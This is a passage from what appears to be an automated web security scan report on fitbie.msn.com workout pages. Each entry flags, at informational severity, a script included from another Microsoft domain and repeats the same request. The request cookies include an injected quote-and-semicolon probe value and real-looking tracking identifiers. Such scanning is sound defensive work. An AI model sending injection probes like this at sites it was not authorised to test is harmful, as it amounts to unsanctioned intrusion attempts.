ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1297603018-1"
Last-Modified: Sun, 13 Feb 2011 13:16:58 +0000
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=38450
Expires: Mon, 14 Feb 2011 01:18:06 GMT
Date: Sun, 13 Feb 2011 14:37:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 86655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.41. http://fitbie.msn.com/workout/15-minute-workout-strengthen-your-body-and-mind previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/workout/15-minute-workout-strengthen-your-body-and-mind

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /workout/15-minute-workout-strengthen-your-body-and-mind HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.42. http://fitbie.msn.com/workout/3-moves-rev-your-metabolism previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/workout/3-moves-rev-your-metabolism

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /workout/3-moves-rev-your-metabolism HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.43. http://fitbie.msn.com/workout/bob-harpers-fat-blasting-workout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/workout/bob-harpers-fat-blasting-workout

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /workout/bob-harpers-fat-blasting-workout HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.44. http://fitbie.msn.com/workout/lose-last-10-pounds previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/workout/lose-last-10-pounds

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /workout/lose-last-10-pounds HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.45. http://fitbie.msn.com/workout/mens-health-muscle-system previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/workout/mens-health-muscle-system

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /workout/mens-health-muscle-system HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.46. http://fitbie.msn.com/workout/muscle-memory-workout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/workout/muscle-memory-workout

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /workout/muscle-memory-workout HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.47. http://fitbie.msn.com/workout/small-changes-big-results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/workout/small-changes-big-results

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /workout/small-changes-big-results HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.48. http://fitbie.msn.com/workout/transform-your-body-strength-workout-d previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/workout/transform-your-body-strength-workout-d

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /workout/transform-your-body-strength-workout-d HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.49. http://fitbie.msn.com/workout/transform-your-body-strength-workout-e previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/workout/transform-your-body-strength-workout-e

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /workout/transform-your-body-strength-workout-e HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.50. http://fitbie.msn.com/workout/transform-your-body-strength-workout-f previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/workout/transform-your-body-strength-workout-f

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /workout/transform-your-body-strength-workout-f HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.51. http://fitbie.msn.com/workout/your-instant-beach-body previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/workout/your-instant-beach-body

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /workout/your-instant-beach-body HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.52. http://fitbie.msn.com/workouts-men/trimming-tools previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/workouts-men/trimming-tools

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /workouts-men/trimming-tools HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; 